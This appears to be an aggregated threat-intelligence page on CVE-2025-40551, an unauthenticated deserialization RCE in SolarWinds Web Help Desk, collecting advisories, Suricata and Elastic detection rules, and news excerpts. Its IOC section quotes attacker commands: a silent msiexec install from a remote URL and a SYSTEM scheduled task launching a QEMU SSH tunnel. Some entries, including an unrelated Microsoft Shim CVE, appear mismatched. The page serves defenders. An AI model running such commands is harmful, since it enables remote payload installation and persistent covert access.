CVE-2025-40551
Published 2026-01-28
Priority: P1 · 97 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2026-02-06
Exploited in the wild
EPSS: 84.13% (99.7th percentile)
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | azl3_shim_15.4-2_on_azure_linux_3.0 | — | — |
| msrc | azl3_shim_15.8-5_on_azure_linux_3.0 | — | — |
| msrc | azure_linux_3.0_arm | — | — |
| msrc | azure_linux_3.0_x64 | — | — |
| msrc | cbl2_shim_15.4-2_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_shim_15.8-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl_mariner_2.0_arm | — | — |
| msrc | cbl_mariner_2.0_x64 | — | — |
| solarwinds | web_help_desk | < 2026.1 | 2026.1 |
| solarwinds | web_help_desk | — | — |
Detection & IOCs (extracted from sources)
command: msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
command: SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
sigma:
any where host.os.type == "windows" and (
  (event.category == "library" and
   process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
   (dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
  (event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
   process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
- Monitor for cmd.exe, powershell.exe, or rundll32.exe spawned as child processes of java.exe located under C:\Program Files\WebHelpDesk\ or C:\Program Files (x86)\WebHelpDesk\; this represents the initial exploitation shell chain.
- Alert on DLL loads by WebHelpDesk java.exe where the DLL path starts with \Device\Mup\ (UNC/network path) or the DLL has an untrusted or absent code signature — indicates remote DLL loading post-exploitation.
- Hunt for creation of a scheduled task named 'TPMProfiler' running as SYSTEM on startup, executing qemu-system-x86_64.exe with SSH port-forwarding arguments (hostfwd=tcp::22022-:22).
- Detect QEMU (qemu-system-x86_64.exe) running from a user temp directory (C:\Users\*\tmp\) with network device arguments — indicates SSH tunnel establishment for persistent access.
- Monitor for Cloudflared (Cloudflare Tunnel client) being silently installed via msiexec from a remote GitHub URL, used by threat actors for encrypted C2 tunneling.
- Detect Active Directory reconnaissance command 'net group "domain computers" /do' executed from processes descended from the WebHelpDesk java.exe process tree.
- Monitor for NTDS.dit access or copy operations on domain controllers following SolarWinds WHD exploitation; threat actors performed DCSync and NTDS.dit extraction for credential dumping.
- CVE-2025-40551 affects SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions; scope detection and patching efforts accordingly.
- Note: Attribution of the active exploitation campaigns to CVE-2025-40551 specifically is not yet confirmed; multiple CVEs (CVE-2025-26399, CVE-2025-40536, CVE-2025-40551) may be responsible.
- Note: Elastic Security Labs had not yet observed direct telemetry for this activity at time of publication; detections are based on Microsoft's external reporting.
- Note: Velociraptor and Cloudflared are legitimate tools; their installation alone may appear benign in many enterprise environments — context (parent process, install source URL) is critical for accurate detection.
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_msrc | — | 5.1 | MEDIUM | — |
CISA
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
cisa·2026-02-03·CVSS 9.8
CVE-2025-40551 [CRITICAL] CWE-502 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
Vulnerability: SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
Affected: SolarWinds Web Help Desk
SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551 ; https://nvd.nist.gov/vuln/detail/CVE-2025-40551
Remediation Due Date: 2026-02-06
Microsoft
Shim: out of bounds read when parsing mz binaries
vendor_msrc·2024-01-09·CVSS 5.1
CVE-2023-40551 [MEDIUM] CWE-125 Shim: out of bounds read when parsing mz binaries
Shim: out of bounds read when parsing mz binaries
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
redhat: redhat
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://learn.mic
GHSA
GHSA-7qrj-j83p-3vqg: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, whic
ghsa_unreviewed·2026-01-28
CVE-2025-40551 [CRITICAL] CWE-502 GHSA-7qrj-j83p-3vqg: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, whic
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
VulnCheck
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-40551 [CRITICAL] CWE-502 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Affected: SolarWinds Web Help Desk
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399; https://www.recordedfuture.com/blog/january-2026-cve-landscape
Suricata
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
suricata·2026-01-29·CVSS 8.1
CVE-2025-40536 [HIGH] ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)"; flow:established,to_server; http.uri; content:"/helpdesk/WebObjects/Helpdesk.woa/wo/"; fast_pattern; content:"/ajax/"; content:"wopage|3d|"; http.method; content:"GET"; reference:url,horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/; reference:cve,2025-40536; classtype:web-application-attack; sid:2067188; rev:1; metadata:affected_product SolarWinds, attack_target Server, tls_state TLSDecrypt, created_at 2026_01_29, cve CVE_2025_40536, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signat
Suricata
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
suricata·2026-01-29·CVSS 9.8
CVE-2025-40551 [CRITICAL] ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)"; flow:established,to_server; http.uri; content:"/helpdesk/WebObjects/Helpdesk.woa/wo/"; fast_pattern; pcre:"/^[\d\.]+/R"; http.request_body; content:"|22|java|2e|"; pcre:"/^[^\x22]*?(?:parentpopup|wonoselectionstring|dummy|mdssubmitlink|mdsform__enterkeypressed|mdsform__shiftkeypressed|mdsform__altkeypressed|_csrf)/R"; content:"|22|method|22 3a|"; content:"|22|wopage|2e|"; within:9; reference:url,horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/
Elastic
Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
elastic_rules·CVSS 9.8
CVE-2025-40536 [CRITICAL] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL).
This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of
deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious
SQLite extensions and achieve remote code execution.
Query:
any where host.os.type == "windows" and
(
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.
Nuclei
SolarWinds Web Help Desk - Authentication Bypass
nuclei·CVSS 9.8
CVE-2025-40554 [CRITICAL] SolarWinds Web Help Desk - Authentication Bypass
SolarWinds Web Help Desk - Authentication Bypass
SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endpoint, an unauthenticated attacker can access privileged administrative functions including authentication configuration settings, SAML/CAS setup, and API key management.
Template:
id: CVE-2025-40554
info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: Bushi-gg
  severity: critical
  description: |
    SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endp
Nuclei
SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
nuclei·CVSS 9.8
CVE-2025-40536 [CRITICAL] SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
Template:
id: CVE-2025-40536
info:
  name: SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
  author: inokii
  severity: high
  description: |
    SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
  impact: |
    Attackers can gain access to certain restricted functionality.
  remediation: |
    Apply the available 12.8.8 Hotfix 1 (HF1) or upgrade to ve
Nuclei
SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
nuclei·CVSS 9.8
CVE-2025-40551 [CRITICAL] SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
SolarWinds Web Help Desk before version 2026.1 contains an insecure deserialization vulnerability in the jabsorb JSON-RPC library. When chained with a CSRF whitelist bypass (CVE-2025-40536), remote unauthenticated attackers can exploit JNDI injection via the Apache Xalan JNDIConnectionPool class to achieve remote code execution. The bypass involves including "/ajax/" in a query parameter to circumvent URI validation, while switching from "/ajax/" to "/wo/" endpoints bypasses payload sanitization routines.
Template:
id: CVE-2025-40551
info:
  name: SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
  author: Horizon3.ai
  severity: critical
  description: |
    SolarWinds Web Help Desk before version 2026.1 c
Metasploit
SolarWinds Web Help Desk unauthenticated RCE
metasploit·CVSS 9.8
CVE-2025-40536 [CRITICAL] SolarWinds Web Help Desk unauthenticated RCE
SolarWinds Web Help Desk unauthenticated RCE
This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD) server.
Bleepingcomputer
Critical Microsoft SharePoint flaw now exploited in attacks
blogs_bleepingcomputer·2026-03-19·CVSS 9.8
CVE-2026-20963 [CRITICAL] Critical Microsoft SharePoint flaw now exploited in attacks
## Critical Microsoft SharePoint flaw now exploited in attacks
## Sergiu Gatlan
A critical Microsoft SharePoint vulnerability patched in January is now being exploited in attacks, the Cybersecurity and Infrastructure Security Agency (CISA) warned.
Tracked as CVE-2026-20963 , this security flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition.
SharePoint Server 2007, SharePoint Server 2010, and SharePoint Server 2013 are also vulnerable to attacks but are end-of-support and no longer receive security updates. Admins are advised to upgrade end-of-support SharePoint Server versions to a supported version to block attacks.
Successful exploitation enables threat actors without privileges to achieve remote code execution on unpatc
Elastic
SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
blogs_elastic·2026-02-10·CVSS 9.8
[CRITICAL] SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
## SolarWinds Web Help Desk Exploitation - February 2026
Elastic Security detection and prevention capabilities for the recently-disclosed SolarWinds Web Help Desk vulnerabilities.
## Summary
- On February 6, 2026, Microsoft reported the exploitation of SolarWinds Web Help Desk (WHD) servers
- The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access
- While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551
- Elastic Security Labs does not observe telemetry events related to this activity as of the date of this publication
Elastic Defend provides comprehensive visibility,
Bleepingcomputer
Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
blogs_bleepingcomputer·2026-02-09·CVSS 9.8
[CRITICAL] Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
## Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
## Bill Toulas
Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes, such as the Zoho ManageEngine remote monitoring and management tool.
The attacker targeted at least three organizations and also leveraged Cloudflare tunnels for persistence, and the Velociraptor cyber incident response tool for command and control (C2).
The malicious activity was spotted over the weekend by researchers at Huntress Security, who believe that it is part of a campaign that started on January 16 and leveraged recently disclosed SolarWinds WHD flaws.
“On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in
Huntress
Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)
blogs_huntress·2026-02-08·CVSS 9.8
[CRITICAL] Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)
Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up.
TL;DR : Huntress has observed threat actors exploiting SolarWinds Web Help Desk vulnerability across 3 customers; organizations should apply the update from SolarWinds’ website as soon as possible.
## Background
On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control.
This intrusion stemmed from the many recently disclosed vulnerabilities affecting SolarWinds WHD. The most critical vulnerabilities grant an adversary arbitrary code execution vi
Bleepingcomputer
CISA flags critical SolarWinds RCE flaw as exploited in attacks
blogs_bleepingcomputer·2026-02-03·CVSS 7.5
CVE-2025-40551 [HIGH] CISA flags critical SolarWinds RCE flaw as exploited in attacks
## CISA flags critical SolarWinds RCE flaw as exploited in attacks
## Sergiu Gatlan
CISA has flagged a critical SolarWinds Web Help Desk vulnerability as actively exploited in attacks and ordered federal agencies to patch their systems within three days.
Tracked as CVE-2025-40551 , this security flaw stems from an untrusted data deserialization weakness discovered and reported by Horizon3.ai security researcher Jimi Sebree , which can allow unauthenticated attackers to gain remote command execution on unpatched devices.
"SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution which would allow an attacker to run commands on the host machine," the company explained on January 28 when it released Web
Bleepingcomputer
SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
blogs_bleepingcomputer·2026-01-28·CVSS 9.8
CVE-2025-40552 [CRITICAL] SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
## SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
## Sergiu Gatlan
SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software.
The authentication bypass security flaws (tracked as CVE-2025-40552 and CVE-2025-40554 ) patched today by SolarWinds were reported by watchTowr's Piotr Bazydlo and can be exploited by remote unauthenticated threat actors in low-complexity attacks.
Bazydlo also found and reported a critical remote code execution (RCE) flaw ( CVE-2025-40553 ) stemming from an untrusted data deserialization weakness that can enable attackers without privileges to run commands on vulnerable hosts.
A second RCE vulnerability ( CVE-2025-40551 ) reported by
Wiz
CVE-2025-40553 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40553 [HIGH] CVE-2025-40553 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40553 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 94.4
Exploitation Probability (EPSS) 14.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity
Wiz
CVE-2025-40536 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2025-40536 [HIGH] CVE-2025-40536 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40536 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 8.1
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 98.6
Exploitation Probability (EPSS) 68.3
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Windows Seve
Wiz
CVE-2025-40537 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40537 [HIGH] CVE-2025-40537 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40537 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions.
Source : NVD
## 7.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 7.5
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity HIGH Has Fix Added at: Jan 29, 2026
Windows Severity HIGH Has Fix Added at: Jan 29, 2026
Wiz
CVE-2025-40551 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40551 [HIGH] CVE-2025-40551 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40551 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 99.6
Exploitation Probability (EPSS) 89.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity
Wiz
CVE-2025-40554 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40554 [HIGH] CVE-2025-40554 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40554 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 90.7
Exploitation Probability (EPSS) 6.1
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Windows Severity CRITICAL Has Fix
Wiz
CVE-2025-40552 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40552 [HIGH] CVE-2025-40552 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40552 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 91.8
Exploitation Probability (EPSS) 7.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Wi
Recorded Future
January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future·CVSS 4.9
[MEDIUM] January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
# January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
- APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
- Microsoft and SmarterTools lead concerns: These vendors accounte
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
Timeline
- 2026-01-28: Published
- 2026-02-03: Added to CISA KEV
- Exploited in the wild